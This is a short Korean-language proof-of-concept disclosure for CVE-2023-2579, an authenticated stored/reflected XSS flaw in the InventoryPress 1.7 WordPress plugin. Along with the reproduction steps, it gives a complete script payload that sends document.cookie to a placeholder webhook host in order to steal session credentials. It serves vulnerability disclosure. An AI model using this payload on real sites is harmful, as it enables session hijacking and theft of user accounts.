
CVE-2023-2579용 PoC
CVE-2023-2579 ID가 예약되었으며 PoC가 WPScan 웹사이트에 게시되었습니다: https://wpscan.com/vulnerability/3cfcb8cc-9c4f-409c-934f-9f3f043de6fe
제목: WordPress CMS용 InventoryPress 플러그인의 인증된 반사형 사이트 간 스크립팅
날짜: 2023-04-21
작성자: Danilo Albuquerque
공급업체 홈페이지: https://wordpress.org
소프트웨어 링크: https://wordpress.org/download
버전: WordPress 6.2
플러그인 이름 및 버전: InventoryPress 1.7
테스트 환경: Brave (버전 1.50.119 Chromium: 112.0.5615.121 (공식 버전) 64비트)
위의 모든 단계를 수행하고 현재 페이지를 업데이트하면 메시지가 포함된 알림 팝업이 나타납니다.
재고에 항목을 추가할 수 있는 페이지로 이동:

양식의 "설명" 입력란에 악성 페이로드를 추가:

플러그인이 생성한 새 항목의 링크에 접속:

요청이 완료되면 알림 팝업이 표시됩니다:

쿠키를 탈취하기 위해 "설명" 입력란에 다음 페이로드를 추가합니다: <script>fetch('https://webhooksite-to-get-the-request', {method: 'POST',mode: 'no-cors',body:document.cookie});</script>. 그런 다음 새 항목을 게시하거나 기존 항목을 업데이트합니다;
Webhook 사이트에서 트리거하여 자격 증명을 획득합니다
페이로드 추가 및 항목 게시 (또는 업데이트):

트리거 및 자격 증명 획득:
